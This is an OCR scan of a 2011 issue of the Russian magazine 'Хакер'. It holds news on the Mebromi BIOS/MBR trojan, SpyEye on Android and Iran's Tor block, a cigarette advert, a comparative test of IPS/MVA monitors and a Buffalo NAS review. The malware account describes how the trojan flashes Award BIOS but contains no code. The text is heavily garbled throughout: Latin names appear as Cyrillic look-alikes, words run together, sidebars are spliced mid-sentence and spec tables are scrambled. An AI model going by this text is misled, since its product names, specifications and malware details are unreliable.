ТРОЯН С НЕ СОВСЕМ СТАНДАРТНЫМ ФУНКЦИОНАЛОМ НАШЛИ ЭКСПЕРТЫ 
КИТАЙСКОГО АНТИВИРУСНОГО ВЕНДОРА 
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итайский производитель антивирусов 360 сообщает, что экс- 
перты вирусной лаборатории обнаружили вредонос, получив- 
шей название Тгоіап.МеЬготі поклассификацииЗутапІес. На 
первый взгляд, это стандартный пофункционалутроян, заражающий 
МБР и пытающийся скачать что-то из сети, но, как выяснилось, в него 
также заложены механизмы, позволяющие заразить ВІОЗ материнской 
платы компьютера. 

ПервоначальнодроппертроянцаТгоіап.Віозкіи проверяет, запуще- 
ны ли ОС процессы нескольких китайских антивирусов: если таковые 
обнаруживаются, то трой создает прозрачное диалоговое окно, из кото- 
рого осуществляется вызов его гла внойфункци и. Затем Тгоіап.МеЬготі 
определяет версию ОС и в случае, если это ѴѴіпсІоѵѵз 2000 и выше (за 
исключениемѴѴіпсІоѵѵзѴізІіа), продолжаетзаражение. Троян проверяет 
состояние командной строки, из которой он может быть запущен с раз- 
личными ключами. В ресурсах дроппера упаковано несколько файлов: 
сЬгот.ехе, Ьоок.гот, ту.зуз, ЬазЬ.сІІІ и Ьіоз.зуз. Если драйвер Ьіоз.зуз не 
удается запустить, или ВІОЗ компьютера отличается от АѵѵагсІ, троянец 
переходит к заражен ию МВР. Но если драй веру Ьіоз.зуз удается опознать 
АѵѵагсІ В 105, то начинается самое интересное. Автор Тгоіап.МеЬготі по- 





Идея внедрения 
малварявВІОБне 
нова. Еще в 1999 
году вирусСІН 
пытался мани- 
пулироватьВІОБ 
своейжертвы, но 
этовлеклозасобой 
разрушительные 
последствия: ВІОБ 
перезаписывался, 
и компьютер после 
этого большене 
загружался. 



шел легким путем, переложив все основные задачи на сам ВІОЗ. Он вос- 
пользовался результатами работы китайского исследователя, извест- 
ного под ником ІсеІогсІ. Работа была проделана еще в 2007 году: тогда при 
анализеутилитыѴѴіпЬазЬ для АѵѵагсІ ВІОЗ был обнаружен простой способ 
перепрошивки микросхемы через сервис, предоставляемый самим В 105 
вЗММ (5уз1:епп Мападетепі: Мобе). Программный код 5ММ в 5М РАМ не 
виден операционной системе (если ВІОЗ написан корректно, доступ к 
этой памятизаблокирован] и исполняется независимоотнее. Назначе- 
ние да иного кода весьма разнообразно: это эмуляция нереализованных 
аппаратно возможностей материнской платы, обработка аппаратных 
ош ибок, управление режима ми питания, сервисные функции ит.д. 

Для модификации самого образа В 105 данная вредоносная програм- 
ма используетутилиту сЬгот.ехе (отРЬоепіхТесЬпоІодіез), которую, как 
и все прочие файлы, несету себя в ресурсах. При помощи этой утилиты 
троянец внедряет в образ свой модуль Ьоок.гот в качестве І5А ВІОЗ РОМ. 
Затем Тгоіап.МеЬготі отдает своему драй веру команду перепрошить 
В 105 из обновленного файла. 

При следующей перезагрузке компьютера в процессе инициализа- 
ции ВІОЗ будет вызывать все имеющиеся РСІ Ехрапзіоп РОМ, в том числе и 
Ьоок.гот. Вредоносный код из этого модуля каждый раз проверяетзара- 
женность МВР и перезаражаетее в случае необходимости. Следует отме- 
тить, что наличие в системе АѵѵагсІ ВІОЗвовсенегарантируетзаражение 
данным троянцем. Так, из трех проверенных в вирусной лаборатории 
матери неких платзаразитьудалосьтолько одну, а в двух других в памяти 
В 105 банально не хватил о места для записи нового модуля. Получается, 
что если после детектирован ия и лечен ия Тгоіап.МеЬготі система вновь 
оказывается инфицирова иной, то источником заражения, скорее всего, 
выступает инфицированный ВІОЗ компьютера. 



УГРОЗЫ ДЛЯ МОБИЛ ЬНЫХУСТРОЙСТВ ВСЕ МНОЖАТСЯ 




39% ПРИЛОЖЕНИЙ 
НА БАЗЕ І05 И АНОКОЮ 
НЕ ОБЕСПЕЧИВАЮТ 
НЕОБХОДИМЫЙ УРОВЕНЬ 
БЕЗОПАСНОСТИ, 
СЧИТАЮТ ЭКСПЕРТЫ 
ѴІАРОКЕЫБІСБ 
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МЕ6АЫЕѴѴ5 



ШТЕІ. И 60061-Е БУДУТ ТЕСНО СОТРУДНИЧАТЬ в целях оптимизации платформы АпсІгоісІ для микропроцессоров Іпіеі. 



5РУЕУЕ ДОБРАЛСЯ ДО АЫБРОЮ 

БАНКОВСКИЙТРОЯНЧУВСТВУЕТСЕБЯ ВОЛЬГОТНО И НА МОБИЛЬНЫХ 
ПЛАТФОРМАХ 



5ру Еуе .. 







□ есной текущего года специалисты Р-5есигеуже били 
тревогу, обнаруживатаку Мап-іп-іИе-МоЬіІе с уча- 
стием модификации ЗруЕуе. Тогда выяснилось, что 
мал варь, созданная на основе известного банковского трояна, 
научилась перехватывать ЗМЗ-сообщения с устройств, 
работа ющих под управлением ЗутЬіап. Дальше — больше. В 
этом месяце исследователи компанииТгизІеегобнаружили 
троянецБріІппо, который перехватываеттекстовые сообще- 
ния, ноужена Апсігоісі-аппаратах. Заражение реализовано 
примитивным образом, почти также как в случае с ЗутЬіап: 
людям, чьи компьютеры уже были инфицированы ЗруЕуе, 
предлагалосьустановитьнателефонфейковоеПОдля 
работы с банковскими онлайн-сервисами. П осле этого 5М5- 
сообщенияжертв, попавшихся наудочкухакеров, начинали 
перехватываться и отправляться на сайт, находящийся под 
контролем злоумышленников. Эксперты Тгиз1:еег пишут, 
что изучили командный сервер, гдехранятся похищенные 
данные, и обнаружили, что вредоносным приложением 
пока инфицировано незначительное количество людей. Но 
а вторы троя на явно за ни маются его развитием, и в будущем 
вполне могут доставить множество неудобств не только бан- 
кам, которые используютодноразовыеТАІ\І-коды, но итаким 
сайтам, какбоодіе и РасеЬоок, которыетакже используют 
смартфоны для рассылки одноразовых паролей. 



Поданным компании 

ТгизІеег,малварьна 

базе2еи5и5руЕуе— 

наиболеечасто 

используемыебан- 

ковскиетрояны.На 

них приходится 72% 

оті.бмиллионаслу- 

чаевобнаруженияи 

удаления вредонос- 

ногопрограммного 

обеспечения, кра- 

дущегофинансовую 

информацию. 



ИРАН ЗАБЛОКИРОВАЛ ТОР 



ТОКВТОТЖЕДЕНЬВЫПУСТИЛ ОБНОВЛЕНИЕ, 
ЧТОБЫ ОБОЙТИ ЭТУ БЛОКИРОВКУ 




четвергутром Иран добавил новое правило 
фильтрации в свой пограничный файрвол для того, 
чтобы блокироватьтрафиксетиТог. Благодаря 
помощи многочисленных друзей со всего света, создатели 
сети быстро определили способ блокировки и выпустили 
новую версию Тог, с помощью которой его можно обойти. К 
счастью, проблема была в ретрансляторе: это означает, что 
достаточно обновить ретрансляторы и бриджи, и многие де- 
сятки тысяч пользователей в Иране снова получат возмож- 
ность работатьсТог, не будучи вынужденными полностью 
менять программное обеспечение. «Как технически работал 
этотфильтр?Тогпытается сделатьтак, чтобы еготрафик 
выглядел просто попыткой веб-браузера связаться с Шрз- 
сервером, но при более внимательном рассмотрении можно 
было увидеть некоторые отличия. В нашем случае это были 
характеристики установления зашифрованного соединения 
Тог'а, в частности дл ительн ость срока действия сертифи- 
ката для 551-сессии: мы изменяли срок действия сертифи- 
ката сессии каждые два часа, в то время как обычный срок 
действия сертификатов — годили больше. Для устране- 
ния блокировки достаточно было просто увеличить срок 
действия сертифи катов, та к что теп ерь на ши сертификаты 
имеют более правдоподобный срок действия», — говорят 
создатели сети. 




МОБИЛЬНУЮ ОС ПЛАНИ- 
РУЕТ ПРИОБРЕСТИ НТС. 

Вероятнее всего, выбор 
компании падет на ѵѵеЬОБ, 
разрабатываемую Раіт 
иНР. 



15% ПОСТОВ С ВИДЕО 
НАРАСЕВООК— ЭТО 
ЫКЕМСКІИ6. То есть 
нажал на видео-поставил 
Ыке! непонятно чему. 



ПИРАТСКОЕ ПО ВСТРЕ- 
ЧАЕТСЯ В РОССИИ НА 
52% КОМПЬЮТЕРОВ. Для 

сравнениям США этотже 
показатель равен 34%, а в 
Нигерии 81%. 



ДОЛЖНОСТЬДИРЕКТОРА 
ПОЗАЩИТЕПЕРСОНАЛЬ- 
НЫХ ДАННЫХ появилась 
в РасеЬоок. Этотпост 
займетЭрин Иган, ранее 
работавший в компании 
юристом. 



ВТОРНИК— ДЕНЬ 0005! 

Почти 23% всех ОРоБ- 
атакза неделю прихо- 
дится именно во вторник, 
сообщает«Лаборатория 
Касперского». 
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5КУРЕ ОБЗАВЕЛСЯ СВОИМ МАГАЗИНОМ ПРИЛОЖЕНИЙ. Пока в Арр йігесіогу доступно порядка 30 программ. 



ГИБКИЙ РИДЕР ОТѴѴЕХБЕР 







а различных выставках вотуже несколько лет 
можно наблюдатьпрезентации гибкой электрон- 
ной бумаги, которая легким движением руки 
сворачивается в трубочку. Тем не менее, ни одного девайса, 
который можнобылобы свернуть втрубочку, рынокпока 
та к не увидел :). Эту ситуацию исправляет компания ѴѴехІег 
сосвоейуникальной разработкой — электронной книгой 
\Л/ЕХІ_ЕР.ВООКРІехОМЕ, выполненной на основе гибкого 6" 
экрана Е-іпкспластиковой подложкой. Благодаря новой 
технологии можно не беспокоиться за безопасность экрана. 
Новинка обладает противоударны ми свойствами, ее можно 
гнуть, ронять на пол и даже носить в заднем кармане джин- 
сов! Основное отличие гибкого дисплея от стандартного экра- 
на на основе электронных чернил заключается в том, что при 
его производстве вместо стеклянной подложки используется 
полимерная. Новый дисплей включаеттончайшую стальную 
пластинуснанесенным на нееслоемэлектронныхсхем, кото- 
рую сверху при крывает пленка из «электронных чернил». Не- 
смотря на всеэто,девайсвыполнен вэргономичном корпусе. 
Габариты — 124x1 39x7, 5 мм, масса — менее 200 г. 

ѴѴЕХІ_ЕР.ВООКРІехОМЕоснащен встроенной памятью 
на 8 ГБ, которую можно расширить до 40 ГБ за счет внешних 
карточек формата МісгоБй. Ридер поддерживает самые по- 
пулярные форматы электронных книг(ТХТ /РОГ/ООС/СНМ 
/НТМ/НТМІ_/ЕРІІВ/РВ2), изображений РР6/ЭРЕ0/ВМР 
/БІГ/РЫбІи аудио файлов (МРЗ). При интенсивном чтении 
полного заряда аккумулятора хватает на несколько недель. 
Поставки читалки начнутся уже в этом месяце. Рекомендо- 
ванная розничная цена — 7.990 руб. 




Начать выпуск 

устройствсгибким 

экраном обещают 

давно. Была 

электронная книга 

Кеасііиз, которую 

анонсировалиеще 

в2010году,датак 

иневыпустили. 

Кромеэтого, можно 

вспомнитьи концепт 

сворачивающегося 

втрубочку01_Е0- 

дисплеяоткомпании 

Бопу. 



ЕБІРІЕР Р1200Т — 

ТЕПЕРЬ В ЧЕРНОМ ЦВЕТЕ 




конце октября компания ЕсІіЛегперевыпускает 
хорош о знакомую пользователям акустическую 
систему ЕсІіГіег Р1 200Т в новом обличии. Данная 
модельтеперьбудетпредставлена в черном цвете. 

Напоминаем, что ЕсІіГіег Р1 200Т — малогабаритная, ка- 
чественно исполненная система (140 х 240 х 1 83 мм), которую 
ввиду скромных размеров без труда можно разместить прямо 
на столе возле монитора. Модельявляется неплохой альтер- 
нативой пластиковым компьютерным колонкам, особенно 
если приходитсяэкономитьпространство. Корпус Р1 200Т из- 
готовлен из МДФи покрытдекоративной пленкой. Передняя 
панель в свою очередь покрыта синтетическим материалом, 
который имитируеткожу,алицевая панельзащищена рам- 
кой, на которую натянутаакустическаяткань. Регулировка 
громкости иуровня баса вынесена назаднюю панель. С 
техн ически ми характеристика ми у Р1200Т все тоже более 
чем неплохо. Все динамики системы магнитноэкранирован- 
ные. Диаметр СЧ/НЧ -динамика — 106 мм, твиттера — 72 мм; 
диапазон воспроизводимыхсистемой частотколеблется 
от52Гцдо20000 Гц. Выходная мощностьсистемы — 2x8Вт 
РМ5, а потребляемая — 25 Вт. Но главное — несмотря на свои 
скромные габариты, ЕсІіГіег Р1200Т звучит очень достой но, 
в частности, дает очень неплохие низкие частоты. Словом, 
неспроста вариация Р1200Т с дизайном «поддерево» в про- 
шлом году получила награду«Лучшая покупка»отжурнала 
«Железо»втестеакустическихсистем 2.0. Розничная цена 
новинки составляет 2 200 рублей. 





ЖШ5Т0Ы Х5ТѴІ.Е ОТ ЖШ5Т0Ы 

ѴѴіпзІоп представляет долгожданную новинку ѴѴіпзІопХБіуІе: 
сигареты более компактного формата, отличающиеся 
особоутонченным вкусом. Инновационнаятехнология 
І_55 + гармонично допол няет мягкость вкуса линии ѴѴіпбіоп 



ХБ и способствует нейтрализации запаха табачного ды 
для окружающих. ѴѴіпзІоп ХБіуІе І_55: новое измерение 
мягкости вкуса. 

*І_55 — меньше запаха табачного дыма. 




МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ: 
КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 






ГЕМШМ 



Сергей Плотников 




С ПРИСТАВКОЙ 

| СРАВНИТЕЛЬНОЕ 

ТЕСТИРОВАНИЕ МОНИТОРОВ 
Ыі НА БАЗЕ ІР2/МѴА-МАТРИЦ 



Заявляем: монитор 
необходимо выбирать 
очень тщательно! Как 
автомобиль или новую 
подружку. Хотя бы потому, 
что перед экраном сего 
чудного устройства 
техноманьяк в среднем 
проводит четверть своей 
жизни! 



• Арріе І_Ей Сіпета Оізріау 

• АБЦБ РА2460 

• йеІІ ШІгаБЬагр 112711 

• ііуата РгоІ_іІеХ2472Н0-1 

• 1.0 ІР5236Ѵ 

• ЫЕС МиІбБупс ЕА232ѴѴМІ 

• ѴіеѵѵБопіс ѴР2365ѵѵЬ 



е веришь? Давай посчитаем. Если 
учесть, что человек начинает «об- 
щаться» с РС где-то в 10-12 лет, то в 
день он проводит перед дисплеем 3-5 часов. 
Повзрослев, приходится просиживать штаны 
еще больше — в районе 8-10 часов в сутки лет 
эдак 30 подряд (учеба, работа, отдых]. Уже бу- 
дучи на пенсии, техноманьяк со стажем уделяет 
компьютеру 1-2 часа в день. В итоге получаем, 
что среднестатистический пользователь за 
свою жизнь проводитза монитором порядка 
140000 часов, 5834 дней или же 16 лет. Согласно 
информации Росстата, средняя продолжитель- 
ность жизни граждан нашей страны составляет 
68.84 года. В итоге и получается, что продвину- 
тый россиянин проводитза экраном монитора 
23.24% своей жизни... 

Так что повторим уже более уверенно: мони- 
тор необходимо выбирать тщательно. Особенно 
это касается людей с творческой натурой и 
профессией. Дизайнерам, а также инженерам, 
постоянно работающим с графическими редак- 
торами и САй-программами, просто необхо- 
дим дисплей с большой диагональю, полной 
глубиной цвета, идеальной цветопередачей и 
большим углом обзора. Естественно, мониторы 
на базе ТІ\І-матриц не могут удовлетворить всех 
потребностей человечества. Поэтому идеаль- 
ным выбором гика-работяги станут устройства 
на базе технологий ІР5 (ЗЕТ) или же МѴА. 

МЕДЛЕННЕЕ, ДОРОЖЕ, НО КРАСИВЕЕ 

Теперь по порядку. Технология ІР5 (Іп-РІапе 
5ѵѵі1:сЫпд) или же ЗЕТ (Зирег Еіпе ТЕТ) была 
разработана компаниями НгіасЫ и ЫЕС (от- 
дельно). Несмотря на разные названия, метод 
работы ЖК-матрицы был неизменен). Второй же 
фильтр всегда был расположен перпендикулярно 
первому, а следовательно, свет через него не 
проходил. Кроме того, только эта технология 
способна передавать полную глубину цвета 




Р6В - 24 бит. Именно поэтому ІРЗ-матрица вы- 
дает практически идеальный черный цвет. Также 
данная технология позволяет получать высокие 
углы обзора, высокую контрастность, цветовой 
охват и цветопередачу... Но за все это приходится 
платить очень большим временем отклика. 

Со временем, к слову, границы ТЫ и ІР5 размы- 
лись. Здесь и сейчас существуют как мониторы на 
базе ТЕТ ТЫ с большими углами, так и мониторы 
на базе ІР5 с быстрым откликом. Стандартов же — 
море. Но больше всего популярны на сегодняшний 
день Н-ІР5 (НогІ 20 пІаІ), Е-ІР5 (ЕпИапсесІ) и Р-ІР5 
(Рго^еззіопаІ). Первый обеспечивает еще большую 
контрастность, а также поддерживаеттехнологию 
АбѵапсесІ Тгие ѴѴЬМ:е, дающую более реалистич- 
ный белый цвет. Второй имеет большую апертуру 
для увеличения светопроницаемости. Наконец, 
Р-ІР5 обеспечивает 1.07 миллиарда цветов при 
30-битной глубине цвета. 

ЗОЛОТАЯ СЕРЕДИНА 

Технология МѴА (МиШ-сІотаіп Ѵегіісаі 
АІідптепі], разработанная компанией Ещ'іізи, 
является компромиссом между ТЫ и ІР5. Она 
позволяет получить матрицу с большими 
вертикальными и горизонтальными углами 
обзора, глубиной цвета и, благодаря технологии 
ускорения РСТ, малым временем отклика. Но в 
сравнении с ІР5 заметна зависимость цветового 
баланса отугла зрения, а также исчезновение 
деталей в тенях при перпендикулярном взгляде. 

Чуть забегая вперед, скажем, что в сегод- 
няшнем тестировании все мониторы, кроме 
одного, основаны на базе той или иной разно- 
видности ІР5-матрицы. Поэтому единственная 
МѴА-модель — ііуата РгоІЛе Х2472ЕЮ-1 — 
априори участвует вне конкурса. 

МЕТОДИКАТЕСТИРОВАНИЯ 

Со всевозможными технологиями ознакоми- 
лись — пора переходить непосредственно к 
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С приставкой Зирег 



тестированию! Пока экран монитора прогре- 
вался в течение получаса, мы изучали дизайн, 
функционал и эргономику девайса. Также уде- 
лили внимание организации меню и наличию (а 
главное качеству) предустановленных настроек 
дисплеев. Для мониторов на базе ІРЗ-матриц 
важным дополнением, безусловно, является 
наличие подставки с несколькими степенями 
свободы, а также опции крепления ѴЕ5А. 

Монитор прогрелся. Первым делом при по- 
мощи программы ТРТіезІ мы изучили равномер- 
ность подсветки вкупе с отклонением яркости 
по краям экрана. Далее при помощи утилиты 



РіхеІ РегзІ5І:епсе Апаіугег мы проверили ис- 
пытуемых на различные профили обновления 
картинки. Правда, к мониторам на базе ІРЗ- 
матриц строго относиться не стоит: все-таки 
технология подразумевает наличие большого 
времени отклика. 

Наконец под занавес тестирования, 
вооружившись профессиональным колори- 
метром 0а1:аСоІог ЗрусІегЗ Еіііе, определялась 
цветопередача (под нулевым углом, под углом 
45 градусов в горизонтальной плоскости и 60 
градусов — в вертикальной) и цветовой охват. 
Первый параметр характеризуется графиком 



стремя Р6В-л иниями. В идеале все линии 
должны быть натянуты ровной, упругой струн- 
кой. Любое отклонение говорит о нарушении 
цветопередачи. Второй параметр характе- 
ризуется площадью красного треугольника. 
Чем больше площадь этой геометрической 
фигуры — тем больше цветовой охват. Для 
сравнения приведен зеленый треугольник, 
а именно стандарт зРбВ. Мониторы на базе 
ІРЗ-матриц непременно должны иметь боль- 
шую площадь цветового охвата. Мониторы на 
базе Р-ІР5-матрицы должны отвечать еще и 
стандарту АбоЬе Р6В. 



АРРІ.Е І.ЕО СІЫЕМА 0І5РЦѴУ 



нешний вид дисплея Арріе можно назвать классическим. 
Яблочной компании только и остается, что запатентовать со- 
четание черного цвета передней панели с бело-серебристой 
задней крышкой корпуса монитора. Чтобы никому не вздумалось 
скопировать идею! Если рассматривать с эстетической точки зрения, то 
равных Арріе І_ЕО Сіпета Оізріау попросту нет. Собственно говоря, за это 
и любят продукцию Стива Джобса. 

Если же попробовать абстрагироваться от философии Арріе, то мож- 
но найти ряд недостатков дисплея. Во-первых, работать с яркой глян- 
цевой поверхностью, да еще под аккомпанемент теплых августовских 
лучей солнца, не совсем удобно. Так и хочется ехидно подколоть «желез- 
ку»: свет мой, зеркальце, скажи... Во-вторых, наличие единственного 
порта Міпі ОізрІауРогІ накладывает особые ограничения при использо- 
вании Арріе І_ЕО Сіпета Оізріау с РС — придется искать графический 
адаптер с соответствующим интерфейсом. Наконец, наличие всего трех 
ІІЗВ-розеток ставит героя этих строк на одну из последних ступенек в 
табели о рангах под названием «функционал». 





А51І5 РА2460 



есмотря на то что диагональ монитора А51І5 РА2460 всего 
24 дюйма (есть в сегодняшнем тестировании и экземпляры 
с 27-дюймовыми экранами), вместе с кронштейном крепле- 
ния конструкция выглядит очень мощно. Если дисплей потребуется 
разместить на столе, то готовься расчистить под него дополнительное 
пространство. Тем не менее, подставка выполнена идеально! В меру 
жесткая, она не позволит ему сместиться ни на йоту. А при необходи- 
мости ты можешь повернуть экран в любую сторону. Подставка обла- 
дает сразу четырьмя степенями свободы. Поэтому подстраиваться под 
монитор не придется: скорее, монитор будет подстраиваться под тебя. 

Что касается функционала, то А51І5 РА2460 оснащен всеми 
современными видеопортами (за исключением, пожалуй, Міпі 
ОізрІауРогІ:), а также тремя портами 115В и универсальным кард- 
ридером на 7 типов флешек. Расположено все «хозяйство» на боко- 
вой панели корпуса, что очень удобно. 

Матрица А51І5 РА2460 соответствует стандарту Р-ІР5. Следо- 
вательно, как мы уже выяснили раньше, обеспечивает 1.07 млрд 
цветов при 30-битной глубине цвета. 



ХАКЕР 11 /154/2011 



017 




РЕККІІМ 



ОЕИ. ІЛТРА5НАКР 112711 



В 



нешне монитор йеІІ I) ИгаБЬагр 112711 выглядит весьма бла- 
городно. Он огромен и прекрасен. Здесь неттой смазливо- 
сти, которая присутствует, например, у дисплея Арріе. Но это 
ничуть не отталкивает. А матовый корпус и экран позволяют полно- 
стью сконцентрироваться на работе. Такой монитор просто обязан 
находиться на столе у начальника какого-нибудь конструкторского 
бюро или же руководителя какой-нибудь тестовой лаборатории. 

За счет мощной подставки йеІІ ІІІІгаЗНагр 112711 обладает тремя 
степенями свободы, что позволяет подстроить большой 27-дюймо- 
вый экран под свои нужды. К сожалению, перевернуть экран на 90 
градусов не получится — подставка не позволяет. 

Богат и функционал дисплея. На левой стороне корпуса экрана рас- 
положена парочка 11513-портов и универсальный кард-ридер на 8 
запоминающих устройств. Если монитор будет находиться на столе, 
то дотянуться до них не составиттруда. Более скрытно себя ведут 
видеоинтерфейсы и БѴІ, Б-ЗиЬ, НОМІ, БізрІауРог* и еще два 115В. По 
сути, перед нами, наверное, самый универсальный монитор с полным 
«фаршем». 





еред нами, как сказал бы светоч русского кинематографа, 
«свой среди чужих, чужой среди своих». Монитор ііуата 
РгоЫіе Х2472НО-1 является представителем и гордым об- 
ладателем ѴА-матрицы. Аточнее, МѴА. Именно поэтому мы решили 
не оценивать это устройство среди других, ибо от лукавого. Но на- 
верняка читатель заинтересуется данной моделью. 

Экран установлен в пластиковую оправу. Согласно последним 
веяниям моды, мы имеем дело с глянцем. Смотрится великолепно до 
первых касаний пальчиками. Запасись тряпочкой! 

Устанавливается корпус на крохотную подставочку. Из-за того что 
общий вес дисплея не превышает четырех килограмм, держится кон- 
струкция довольно надежно. Но из-за небольшого количества степе- 
ней свободы (монитор можно вращать лишь вокруг горизонтальной 
оси] возможностей по регулировке положения экрана немного. 

Наконец, расстраивает функциональная составляющая монитора. 
Правда, вендор обещает в ближайшее время выпустить улучшенную 
модель ВХ2472НО сулучшенной подставкой. Помимо видеоин- 
терфейсов 0-5иЬ, йѴІ и НОМІ, на корпусе ііуата РгоІ_Н:е Х2472НО-1 
больше ничего нет. 



ТЕХНИЧЕСКИЕ 

ХАРАКТЕРИСТИКИ 



Тип матрицы: 

Диагональ, разрешение: 

Углы обзора по горизонтали/вертикали: 
Количество цветов: 

Контрастность: 

Время отклика: 

Габариты: 

1 / 0 : 

Вес: 



КЗ 



Арріе І-Ей Сіпета 
йізріау 



ІР5 




А51І5 РА2460 



ІР5 




27", 2560x1440 точек 
178/178 градусов 

16.7 млн 
1000:1 
12 мс 

490x650x201 мм 

Міпі ОізрІауРогЦ Зх 115В 2.0 

10.7 кг 



24.1", 1920x1200 точек 
178/178 градусов 

1073.7 млн 
1000:1 
6 мс 

559x381x235 мм 

1 х 0-5иЬ, 1 х т, 1х НОМІ, 1 х ОізрІауРогЦ Зх 115В 
2.0, кард-ридер 
7.3 кг 



27", 2560x1440 точек 
178/178 градусов 

1073.7 млн 
1000:1 

6 мс 

647x428x200 мм 

1 х й-5иЬ, 2х Ш, 1х НОМІ, 1х ОізрІауРогЦ 5х 115В 
2.0, кард-ридер 

7.7 кг 
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С приставкой Бирег 



ЫЕС МІЛ.ТІ5ѴЫС ЕА232ЖМІ 



В 



нешне монитор ЫЕС МиШБупс ЕА232ѴѴМІ выглядит очень 
строго. Здесь не найдешь особых закругленных форм корпу- 
са и не прищуришься от блика маркого, глянцевого корпуса. 
Но это не означает, что он плохо выглядит. Просто данная модель 
превосходно подойдет для строгого интерьера — того же рабочего 
кабинета. Очень удобная подставка позволит вращать дисплей как 
душе угодно. Неоспоримый плюс для дизайнера или инженера. А 
сбоку и сзади, помимо видеовыходов, есть сразу 5 портов 115В. 

Настройками меню достаточно легко управлять при помощи 
своеобразного джойстика. Воспользоваться опциями ЫЕС МиШБупс 
ЕА232ѴѴМІ пришлось из-за того, что так называемый ЕСО Мобе посто- 
янно изменял уровень яркости экрана. Работать с такой цветомузы- 
кой было невозможно. Поэтому стоит использовать технологию в мо- 
менты, когда не пользуешься монитором. С другой стороны, почему 
бы просто не отключить дисплей или не заставить уйти ПК в спящий 
режим? С третьей стороны, проблемы экологии, затрагиваемые ЫЕС, 
достойны уважения. 





ѴІЕѴѴ50ЫІС ѴР2365ѴѴВ 



а верша ет сегодняшнее тестирование монитор от компании 
ѴіеѵѵБопіс. Примечательно, что мы уже знакомились с этим 
устройством год назад. К сожалению, картина осталась 
печальной: за столь продолжительный срок цена на ІРБ-матрицы 
изменилась не сильно. 

Модель под скромным названием ѴР2365ѵѵЬ внешне напоминает 
ЫЕС МиШБупс ЕА232ѴѴМІ. Но никакого копирования здесь нет. Просто 
для инженеров, художников, дизайнеров и архитекторов подобная 
конструкция, на наш взгляд, является оптимальной. Вот и дисплей 
от «птичьей» компании обладает подставкой с четырьмя степенями 
свободы. А потому расположить/повернуть экран на рабочем столе 
не составит труда. 

К сожалению, для нас является загадкой, почему инженеры 
ѴіеѵѵБопіс не разместили имеющиеся порты 115В на боковой панели. 
Все 4 слота расположены сзади: как следствие, к ним не очень 
удобно обращаться. Там же находятся видеоинтерфейсы: 0-5иЬ и 
йѴІ — набор, признаемся, спартанский. Для удержания всех прово- 
дов в одном пучке на ножке подставки предусмотрены специальные 
рамочки. 




ііуата РгоЫіе 
Х2472НШ-1 



МѴА 

24", 1920x1080 точек 
178/178 градусов 
16.7 млн 
3000:1 
8 мс 

570x420x179 мм 
1х 0-5иЬ, 1х йѴІ, 1х І-ЮМІ 



3.6 кг 




ІР5 

23”, 1920x1080 точек 
178/178 градусов 
16.7 млн 
1000:1 
14 мс 

550x379x220 мм 

1х тіпі й-ЗиЬ, 1х йѴІ, 1х ОіврІауРогЦ 
5x115В 2.0 
7.5 кг 



ІР5 

23", 1920x1080 точек 
178/178 градусов 
16.7 млн 
1000:1 
5 мс 

548x434x250 мм 
1х й-БиЬ, 1х йѴІ, 4х 115В 2.0 
6.8 кг 



РАЗДАЕМ МЕДАЛЬКИ 

Лучшие показатели продемонстрировал йеІІ 
ІІИгаБНагр 112711. Даже под углом 60 градусов пре- 
тензий к картинке нет (на фоне остальных участ- 
ников]. Вкупе с богатым функционалом дисплея и 
огромной диагональю в нашей тестовой лаборато- 
рии не закралось ни единого сомнения касательно 
победителя в номинации «Выбор редакции». Если у 
тебя есть 30000 рублей, тебе необходим монитор на 
базе ІР5- матрицы, то почему ты еще не в магазине? 

Приз «Лучшая покупка» получил монитор А51І5 
РА2460. Пожалуй, идеальное решение для дизай- 
нера и инженера, которому постоянно необходимо 
работать дома, □с 
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ГЕМШМ 



Алексей Шуваев 



ЛИНЕЙКА: ВІІРРАІ.0 



Японская компания ВіЖаІо — один из крупнейших мировых 
производителей сетевых накопителей хранения данных. Этой 
осенью компания пришла на российский рынок, и нам стало 
интересно познакомиться с новым для России семейством 




Интерфейс диска: 1 х 5АТА- 
Поддерживаемая емкость: 

1,2,3 Тб 

Интерфейсы: ЕіНегпеІ 
10/100/1000 МЬрз, 1 X УБВ 2.0 
Поддерживаемые протоколы 
5МВ/СІР5, АРР, РТР, НТТР, 
НТТР5 (ѴѴеЬАссезз), ЫТР 
Потребляемая мощность: 

17 Вт/ макс. 24 Вт 
Габариты:45х 1 56 х 175 мм 
Вес: 1.1 кг 



ЫЫК5ТАТЮЫ РКО 

од определенным ракурсом этот девайс своей формой на- 
поминает игровую консоль от МісгозоН. Правда, устройство 
ВиНаІо заметно меньше, а также наделено рядом талантов, 
которые сложно переоценить. К примеру, девайс может хранить 
до 3 терабайт информации, что даже по нынешним меркам очень 
достойно. Сетевой накопитель с гигабитным интерфейсом обе- 
спечит контентом все домашние устройства, благо можно не только 
пользоваться расшаренными папками, но и подключаться к ЫАЗ при 
помощи медиаплееров, поддерживающих ОІ_МА и ІІРпР. Однодиско- 
вая модель практически бесшумна и потребляет минимум энергии, 
а еще может служить на раздаче торрентов и работать в качестве 
принт-сервера, если подключить принтер к свободному ІІБВ-порту. 



ЫЫКЗТАТЮЫ оію 




азгоняи тоску и повышай надежность с двухдиско- 
вым девайсом, который позволяет поднять скорость 
передачи данных или удвоить надежность хранимой 
информации за счет зеркалирования дисков. Закинув в топку 
хранилища пару дисков, можно получить раздел емкостью до 
6 Тб — этого за глаза хватит для хранения как личного медиа- 
архива, так и для размещения личных файлов и организации 
рабочей инфраструктуры. Если ты поклонник девайсов с над- 
кусанным яблоком, то оценишь поддержку Арріе ТітеМасЫпе 
— можно хранить столько снэпшотов, сколько тебе потребует- 
ся. При установке приложения ѴѴеЬАссезз на іРЬопе и АпбгоісІ- 
коммуникаторы, можно получить доступ к хранимому контенту 
практически из любой точки Земли, где есть связь. 



шш 




ШЖ 


Ж 



Интерфейс диска: 2 х 5АТА-ІІ 
Объем: 2, 4, 6 Тб 
Поддерживаемые уровни 
ПАЮ: 0, 1 и ВіапсІагсІ 
Интерфейсы: ЕИіегпеІ 
10/100/1000 МЬрз, 1 х У5В 2.0 
Поддерживаемые 
протоколы: 5МВ/СІР5, АРР, 
РТР/РТР5, 5 РТР, НТТР, НТТР5 
(ѴѴеЬАссезз), ИТР, КегЬегоз 
Потребляемая мощность: 

26 Вт 

Габариты: 86 х 204 х 127 мм 
Вес: 2.3 кг 
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ЛИНЕЙКА: БУЕРАК) 





Интерфейс диска: 2 х 5АТА-ІІ 
